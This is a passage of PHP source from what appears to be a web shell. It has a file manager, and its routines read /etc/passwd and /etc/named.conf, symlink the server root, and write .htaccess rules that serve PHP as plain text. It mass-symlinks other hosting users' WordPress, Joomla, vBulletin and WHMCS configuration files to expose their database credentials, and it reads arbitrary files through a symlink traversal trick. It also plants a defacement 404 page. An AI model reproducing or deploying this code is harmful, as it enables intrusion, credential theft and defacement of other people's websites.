2049 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2050
2051 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2052 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
2053 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2054 </tr>
2055 <p>
2056 <?php
2057 }
2058 }
2059
2060 echo "</table>
2061<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
2062<select class=sbox name=choice style='width: 100px;'>
2063 <option value=delete>Delete</option>
2064 <option value=chmod>Change mode</option>
2065 if(class_exists('ZipArchive'))
2066 { <option value=compre>Compress</option>
2067 <option value=uncompre>Uncompress</option> }
2068 </select>
2069
2070 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
2071 }}
2072 else
2073 {
2074 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
2075 }
2076
2077}
2078if(isset($_REQUEST["script"]))
2079{
2080 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
2081 ?>
2082 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('scserver')"><font class=txt size="4">| Use Server |</font></a></td>
2083 <td><a href=javascript:void(0) onClick="getdata('scphp')"><font class=txt size="4">| Use PHP |</font></a></td>
2084 </tr></table></center>
2085 <?php
2086}
2087elseif(isset($_REQUEST["scserver"]))
2088{
2089 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('servermanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2090 <td><a href=javascript:void(0) onClick="getdata('serverscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2091 </tr></table></center><?php
2092}
2093else if(isset($_REQUEST['servermanuallyscript']))
2094{
2095 ?>
2096 <center>
2097 <form action="<?php echo $self; ?>" method="post">
2098 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2099 <input type="button" OnClick="manuallyscriptfn('serverscriptlocator',passwd.value)" value="Get Config" class="but">
2100 </form>
2101 </center>
2102 <?php
2103}
2104elseif(isset($_REQUEST['serverscriptlocator']))
2105{
2106 if($os != "Windows")
2107 {
2108 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2109 $path=explode('/',$url);
2110 $url =str_replace($path[count($path)-1],'',$url);
2111 if(isset($_REQUEST['passwd']))
2112 {
2113 $getetc = trim($_REQUEST['passwd']);
2114
2115 mkdir("dhanushSPT");
2116 chdir("dhanushSPT");
2117
2118 $myfile = fopen("test.txt","w");
2119
2120 fputs($myfile,$getetc);
2121 fclose($myfile);
2122 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Username</font></td><td align=center><font size=4 >Script</font></td></tr>";
2123 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2124 while(!feof($file))
2125 {
2126 $s = fgets($file);
2127 $matches = array();
2128 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2129 $matches = str_replace("home/","",$matches[1]);
2130 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2131 $headers=get_headers($hs_status);
2132 if(strpos($headers[0],'200') == true )
2133 $hs_script = "Wordpress";
2134 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2135 $headers=get_headers($hs_status);
2136 if(strpos($headers[0],'200') == true )
2137 $hs_script = "Wordpress";
2138 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2139 $headers=get_headers($hs_status);
2140 if(strpos($headers[0],'200') == true )
2141 $hs_script = "Joomla";
2142 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2143 $headers=get_headers($hs_status);
2144 if(strpos($headers[0],'200') == true )
2145 $hs_script = "Vbulletin";
2146 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2147 $headers=get_headers($hs_status);
2148 if(strpos($headers[0],'200') == true )
2149 $hs_script = "Vbulletin";
2150 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2151 $headers=get_headers($hs_status);
2152 if(strpos($headers[0],'200') == true )
2153 $hs_script = "Mybb";
2154 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2155 $headers=get_headers($hs_status);
2156 if(strpos($headers[0],'200') == true )
2157 $hs_script = "IPB";
2158 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2159 $headers=get_headers($hs_status);
2160 if(strpos($headers[0],'200') == true )
2161 $hs_script = "SMF";
2162 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2163 $headers=get_headers($hs_status);
2164 if(strpos($headers[0],'200') == true )
2165 $hs_script = "WHMCS";
2166 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2167 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2168 $dcount++;
2169 }
2170 echo "</table>";
2171 fclose($file);
2172 unlink("test.txt");
2173 }
2174 else
2175 {
2176 $d0mains = @file("/etc/named.conf");
2177 if($d0mains)
2178 {
2179 @mkdir("dhanush",0777);
2180 @chdir("dhanush");
2181 execmd("ln -s / root");
2182 $file3 = 'Options all
2183 DirectoryIndex Sux.html
2184 AddType text/plain .php
2185 AddHandler server-parsed .php
2186 AddType text/plain .html
2187 AddHandler txt .html
2188 Require None
2189 Satisfy Any
2190 ';
2191 $fp3 = fopen('.htaccess','w');
2192 $fw3 = fwrite($fp3,$file3);
2193 @fclose($fp3);
2194 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Site</font></td><td align=center><font size=4 >Script</font></td></tr>";
2195 $dcount = 1;
2196 foreach($d0mains as $d0main)
2197 {
2198 if(eregi("zone",$d0main))
2199 {
2200 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2201 flush();
2202
2203 if(strlen(trim($domains[1][0])) > 2)
2204 {
2205 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2206 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/wp-config.php";
2207 $headers=get_headers($hs_status);
2208 if(strpos($headers[0],'200') == true )
2209 $hs_script = "Wordpress";
2210 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/blog/wp-config.php";
2211 $headers=get_headers($hs_status);
2212 if(strpos($headers[0],'200') == true )
2213 $hs_script = "Wordpress";
2214 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/configuration.php";
2215 $headers=get_headers($hs_status);
2216 if(strpos($headers[0],'200') == true )
2217 $hs_script = "Joomla";
2218 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/forum/includes/config.php";
2219 $headers=get_headers($hs_status);
2220 if(strpos($headers[0],'200') == true )
2221 $hs_script = "Vbulletin";
2222 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/core/includes/config.php";
2223 $headers=get_headers($hs_status);
2224 if(strpos($headers[0],'200') == true )
2225 $hs_script = "Vbulletin";
2226 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/inc/config.php";
2227 $headers=get_headers($hs_status);
2228 if(strpos($headers[0],'200') == true )
2229 $hs_script = "Mybb";
2230 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/conf_global.php";
2231 $headers=get_headers($hs_status);
2232 if(strpos($headers[0],'200') == true )
2233 $hs_script = "IPB";
2234 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/settings.php";
2235 $headers=get_headers($hs_status);
2236 if(strpos($headers[0],'200') == true )
2237 $hs_script = "SMF";
2238 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/submitticket.php";
2239 $headers=get_headers($hs_status);
2240 if(strpos($headers[0],'200') == true )
2241 $hs_script = "WHMCS";
2242 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td><a href=".$domains[1][0]." target='_blank'><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt><a href=".$hs_status." target=_blank>".$hs_user."</a></font></td></tr>"; flush();
2243
2244 $dcount++;
2245 }
2246 }
2247
2248 }
2249 echo "</table>";
2250 }
2251 else
2252 {
2253 $TEST=@file('/etc/passwd');
2254 if ($TEST)
2255 {
2256 @mkdir("dhanush",0777);
2257 @chdir("dhanush");
2258 execmd("ln -s / root");
2259 $file3 = 'Options all
2260 DirectoryIndex Sux.html
2261 AddType text/plain .php
2262 AddHandler server-parsed .php
2263 AddType text/plain .html
2264 AddHandler txt .html
2265 Require None
2266 Satisfy Any
2267 ';
2268 $fp3 = fopen('.htaccess','w');
2269 $fw3 = fwrite($fp3,$file3);
2270 @fclose($fp3);
2271
2272 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2273
2274 $dcount = 1;
2275 $file = fopen("/etc/passwd", "r");
2276 //Output a line of the file until the end is reached
2277 while(!feof($file))
2278 {
2279 $s = fgets($file);
2280 $matches = array();
2281 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2282 $matches = str_replace("home/","",$matches[1]);
2283 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2284 $headers=get_headers($hs_status);
2285 if(strpos($headers[0],'200') == true )
2286 $hs_script = "Wordpress";
2287 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2288 $headers=get_headers($hs_status);
2289 if(strpos($headers[0],'200') == true )
2290 $hs_script = "Wordpress";
2291 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2292 $headers=get_headers($hs_status);
2293 if(strpos($headers[0],'200') == true )
2294 $hs_script = "Joomla";
2295 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2296 $headers=get_headers($hs_status);
2297 if(strpos($headers[0],'200') == true )
2298 $hs_script = "Vbulletin";
2299 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2300 $headers=get_headers($hs_status);
2301 if(strpos($headers[0],'200') == true )
2302 $hs_script = "Vbulletin";
2303 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2304 $headers=get_headers($hs_status);
2305 if(strpos($headers[0],'200') == true )
2306 $hs_script = "Mybb";
2307 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2308 $headers=get_headers($hs_status);
2309 if(strpos($headers[0],'200') == true )
2310 $hs_script = "IPB";
2311 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2312 $headers=get_headers($hs_status);
2313 if(strpos($headers[0],'200') == true )
2314 $hs_script = "SMF";
2315 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2316 $headers=get_headers($hs_status);
2317 if(strpos($headers[0],'200') == true )
2318 $hs_script = "WHMCS";
2319 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2320 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2321 $dcount++;
2322 }
2323 fclose($file);
2324
2325 echo "</table>";
2326 }
2327 else
2328 {
2329 @mkdir("dhanush",0777);
2330 @chdir("dhanush");
2331 execmd("ln -s / root");
2332 $file3 = 'Options all
2333 DirectoryIndex Sux.html
2334 AddType text/plain .php
2335 AddHandler server-parsed .php
2336 AddType text/plain .html
2337 AddHandler txt .html
2338 Require None
2339 Satisfy Any
2340 ';
2341 $fp3 = fopen('.htaccess','w');
2342 $fw3 = fwrite($fp3,$file3);
2343 @fclose($fp3);
2344 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2345 $temp = "";
2346 $val1 = 0;
2347 $val2 = 1000;
2348 for(;$val1 <= $val2;$val1++)
2349 {
2350 $uid = @posix_getpwuid($val1);
2351 if ($uid)
2352 $temp .= join(':',$uid)."\n";
2353 }
2354 echo '<br/>';
2355 $temp = trim($temp);
2356
2357 $file5 = fopen("test.txt","w");
2358 fputs($file5,$temp);
2359 fclose($file5);
2360
2361 $dcount = 1;
2362 $file = fopen("test.txt", "r");
2363 while(!feof($file))
2364 {
2365 $s = fgets($file);
2366 $matches = array();
2367 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2368 $matches = str_replace("home/","",$matches[1]);
2369 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2370 $headers=get_headers($hs_status);
2371 if(strpos($headers[0],'200') == true )
2372 $hs_script = "Wordpress";
2373 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2374 $headers=get_headers($hs_status);
2375 if(strpos($headers[0],'200') == true )
2376 $hs_script = "Wordpress";
2377 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2378 $headers=get_headers($hs_status);
2379 if(strpos($headers[0],'200') == true )
2380 $hs_script = "Joomla";
2381 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2382 $headers=get_headers($hs_status);
2383 if(strpos($headers[0],'200') == true )
2384 $hs_script = "Vbulletin";
2385 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2386 $headers=get_headers($hs_status);
2387 if(strpos($headers[0],'200') == true )
2388 $hs_script = "Vbulletin";
2389 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2390 $headers=get_headers($hs_status);
2391 if(strpos($headers[0],'200') == true )
2392 $hs_script = "Mybb";
2393 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2394 $headers=get_headers($hs_status);
2395 if(strpos($headers[0],'200') == true )
2396 $hs_script = "IPB";
2397 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2398 $headers=get_headers($hs_status);
2399 if(strpos($headers[0],'200') == true )
2400 $hs_script = "SMF";
2401 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2402 $headers=get_headers($hs_status);
2403 if(strpos($headers[0],'200') == true )
2404 $hs_script = "WHMCS";
2405 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2406 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2407 $dcount++;
2408 }
2409 fclose($file);
2410 echo "</table>";
2411 unlink("test.txt");
2412 }
2413 }
2414 }
2415 }
2416 else
2417 echo "<center>Cannot Get Scripts</center>";
2418}
2419elseif(isset($_REQUEST["scphp"]))
2420{
2421 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('phpmanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2422 <td><a href=javascript:void(0) onClick="getdata('phpscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2423 </tr></table></center><?php
2424}
2425else if(isset($_REQUEST['phpmanuallyscript']))
2426{
2427 ?>
2428 <center>
2429 <form action="<?php echo $self; ?>" method="post">
2430 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2431 <input type="button" OnClick="manuallyscriptfn('phpscriptlocator',passwd.value)" value="Get Config" class="but">
2432 </form>
2433 </center>
2434 <?php
2435}
2436else if(isset($_REQUEST['phpscriptlocator']))
2437{
2438 if($os == "Linux")
2439 {
2440 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2441 $path=explode('/',$url);
2442 $url =str_replace($path[count($path)-1],'',$url);
2443 function syml($usern,$pdomain)
2444 {
2445 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2446 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2447 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2448 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2449 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2450 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
2451 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2452 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2453 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
2454 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2455 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2456 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2457 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2458 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2459 symlink('/home/'.$usern.'/public_html/bb-config.php',$pdomain.'~~boxbilling.txt');
2460 symlink('/home/'.$usern.'/public_html/billing/bb-config.php',$pdomain.'~~boxbilling.txt');
2461 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2462 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2463 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2464 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2465 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2466 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2467 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2468 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2469 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2470 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
2471 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
2472 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2473 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
2474 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
2475 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2476 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
2477 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2478 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2479 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2480 }
2481 if(isset($_REQUEST['passwd']))
2482 {
2483 $getetc = trim($_REQUEST['passwd']);
2484
2485 mkdir("dhanushSPT");
2486 chdir("dhanushSPT");
2487 $file3 = 'Options all
2488 DirectoryIndex Sux.html
2489 AddType text/plain .php
2490 AddHandler server-parsed .php
2491 AddType text/plain .html
2492 AddHandler txt .html
2493 Require None
2494 Satisfy Any
2495 ';
2496 $fp3 = fopen('.htaccess','w');
2497 $fw3 = fwrite($fp3,$file3);
2498 @fclose($fp3);
2499 $myfile = fopen("test.txt","w");
2500 fputs($myfile,$getetc);
2501 fclose($myfile);
2502
2503 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2504 while(!feof($file))
2505 {
2506 $s = fgets($file);
2507 $matches = array();
2508 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2509 $matches = str_replace("home/","",$matches[1]);
2510 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2511 continue;
2512 syml($matches,$matches);
2513 }
2514 fclose($file);
2515 unlink("test.txt");
2516 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2517 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2518
2519 }
2520 else
2521 {
2522 $d0mains = @file("/etc/named.conf");
2523 if($d0mains)
2524 {
2525 mkdir("dhanushST");
2526 chdir("dhanushST");
2527 $file3 = 'Options all
2528 DirectoryIndex Sux.html
2529 AddType text/plain .php
2530 AddHandler server-parsed .php
2531 AddType text/plain .html
2532 AddHandler txt .html
2533 Require None
2534 Satisfy Any
2535 ';
2536 $fp3 = fopen('.htaccess','w');
2537 $fw3 = fwrite($fp3,$file3);
2538 @fclose($fp3);
2539 foreach($d0mains as $d0main)
2540 {
2541 if(eregi("zone",$d0main))
2542 {
2543 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2544 flush();
2545
2546 if(strlen(trim($domains[1][0])) > 2)
2547 {
2548 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2549
2550 syml($user['name'],$domains[1][0]);
2551 }
2552 }
2553 }
2554 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2555 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2556 }
2557 else
2558 {
2559 mkdir("dhanushSPT");
2560 chdir("dhanushSPT");
2561 $file3 = 'Options all
2562 DirectoryIndex Sux.html
2563 AddType text/plain .php
2564 AddHandler server-parsed .php
2565 AddType text/plain .html
2566 AddHandler txt .html
2567 Require None
2568 Satisfy Any
2569 ';
2570 $fp3 = fopen('.htaccess','w');
2571 $fw3 = fwrite($fp3,$file3);
2572 @fclose($fp3);
2573 $temp = "";
2574 $val1 = 0;
2575 $val2 = 1000;
2576 for(;$val1 <= $val2;$val1++)
2577 {
2578 $uid = @posix_getpwuid($val1);
2579 if ($uid)
2580 $temp .= join(':',$uid)."\n";
2581 }
2582 echo '<br/>';
2583 $temp = trim($temp);
2584
2585 $file5 = fopen("test.txt","w");
2586 fputs($file5,$temp);
2587 fclose($file5);
2588
2589
2590 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2591 while(!feof($file))
2592 {
2593 $s = fgets($file);
2594 $matches = array();
2595 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2596 $matches = str_replace("home/","",$matches[1]);
2597 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2598 continue;
2599 syml($matches,$matches);
2600 }
2601 fclose($file);
2602 echo "</table>";
2603 unlink("test.txt");
2604 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2605 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2606 }
2607 }
2608 }
2609 else
2610 echo "<center>Cannot Complete the task!!!!</center>";
2611
2612}
2613else if(isset($_GET["symlinkfile"]))
2614{
2615 if(!isset($_GET['file']))
2616 {
2617 ?>
2618 <center>
2619 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
2620 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
2621 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
2622 </form></center>
2623 <br><br>
2624 <?php
2625 }
2626}
2627else if(isset($_GET['symlinkmyfile']))
2628{
2629 if($os == "Linux")
2630 {
2631 $fakedir="cx";
2632 $fakedep=16;
2633
2634 $num=0; // offset of symlink.$num
2635
2636 if(!empty($_GET['myfile']))
2637 $file=$_GET['myfile'];
2638 else $file="";
2639
2640 if(empty($file))
2641 exit;
2642
2643 if(!is_writable("."))
2644 echo "not writable directory";
2645
2646 $level=0;
2647
2648 for($as=0;$as<$fakedep;$as++)
2649 {
2650 if(!file_exists($fakedir))
2651 mkdir($fakedir);
2652 chdir($fakedir);
2653 }
2654
2655 while(1<$as--) chdir("..");
2656
2657 $hardstyle = explode("/", $file);
2658
2659 for($a=0;$a<count($hardstyle);$a++)
2660 {
2661 if(!empty($hardstyle[$a]))
2662 {
2663 if(!file_exists($hardstyle[$a]))
2664 mkdir($hardstyle[$a]);
2665 chdir($hardstyle[$a]);
2666 $as++;
2667 }
2668 }
2669 $as++;
2670 while($as--)
2671 chdir("..");
2672
2673 @rmdir("fakesymlink");
2674 @unlink("fakesymlink");
2675
2676 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
2677
2678 while(1)
2679 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
2680 else $num++;
2681
2682 @unlink("fakesymlink");
2683 mkdir("fakesymlink");
2684
2685 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
2686 }
2687 else
2688 echo '<CENTER>Cannot Create Symlink</CENTER>';
2689}
2690else if(isset($_POST['cpaneluser']))
2691{
2692 if(is_numeric($_POST['noofsubdomain']))
2693 {
2694 for($i=1;$i<=$_POST['noofsubdomain'];$i++)
2695 {
2696 $subDomain = randomt();
2697 echo make_subdomain($subDomain,$_POST['cpaneluser'],$_POST['cpanelpass'],$_POST['subindex']);
2698 }
2699 }
2700 else
2701 echo "Insert number";
2702}
2703else if(isset($_REQUEST['404new']))
2704{
2705 ?>
2706 <form>
2707 <center><textarea name=message cols=100 rows=18 class=box>lol! POI50N OP3R470R WAS HERE !!!!!</textarea></br>
2708 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
2709 </br>
2710 </form>
2711 <?php
2712}
2713else if(isset($_REQUEST['404page']))
2714{
2715 $url = $_SERVER['REQUEST_URI'];
2716 $path=explode('/',$url);
2717 $url =str_replace($path[count($path)-1],'',$url);
2718 if(isset($_POST['message']))
2719 {
2720 if($myfile = fopen(".htaccess", "a"))
2721 {
2722 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2723 if($myfilee = fopen("404.html", "w+"))
2724 {
2725 fwrite($myfilee, $_POST['message']);
2726 }
2727 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2728 }
2729 else
2730 echo "<center>Cannot Set 404 Page</center>";
2731 }
2732 else if(strlen($ind) != 0)
2733 {
2734 if($myfile = fopen(".htaccess", "a"))
2735 {
2736 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2737
2738 if($myfilee = fopen("404.html", "w+"))
2739 {
2740 fwrite($myfilee, base64_decode($ind));
2741
2742 fclose($myfilee);
2743 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2744 }
2745 fclose($myfile);
2746 }
2747 else
2748 {
2749 echo "<center>Cannot Set 404 Page</center>";
2750 }
2751 }
2752 else
2753 echo "<center>Nothing Specified in the shell</center>";
2754}
2755else if(isset($_GET["symlink"]))
2756{
2757 $d0mains = @file("/etc/named.conf");
2758 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2759 $path=explode('/',$url);
2760 $url =str_replace($path[count($path)-1],'',$url);
2761 if($d0mains)
2762 {
2763 @mkdir("dhanush",0777);
2764 @chdir("dhanush");
2765 execmd("ln -s / root");
2766
2767 $file3 = 'Options all
2768 DirectoryIndex Sux.html
2769 AddType text/plain .php
2770 AddHandler server-parsed .php
2771 AddType text/plain .html
2772 AddHandler txt .html
2773 Require None
2774 Satisfy Any
2775 ';
2776 $fp3 = fopen('.htaccess','w');
2777 $fw3 = fwrite($fp3,$file3);
2778 @fclose($fp3);
2779
2780 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
2781
2782 $dcount = 1;
2783 foreach($d0mains as $d0main)
2784 {
2785 if(eregi("zone",$d0main))
2786 {
2787 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2788 flush();
2789
2790 if(strlen(trim($domains[1][0])) > 2)
2791 {
2792 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2793
2794 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
2795 $dcount++;
2796 }
2797 }
2798
2799 }
2800 echo "</table>";
2801 }
2802 else
2803 {
2804 if($os == "Linux")
2805 {
2806 ?>
2807 <div style="float:left;position:fixed;">
2808 <form>
2809 <table cellpadding="9">
2810 <tr>
2811 <th colspan="2">Get User Name</th>
2812 </tr>
2813 <tr>
2814 <td>Enter Website Name :</td>
2815 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
2816 </tr>
2817 <tr>
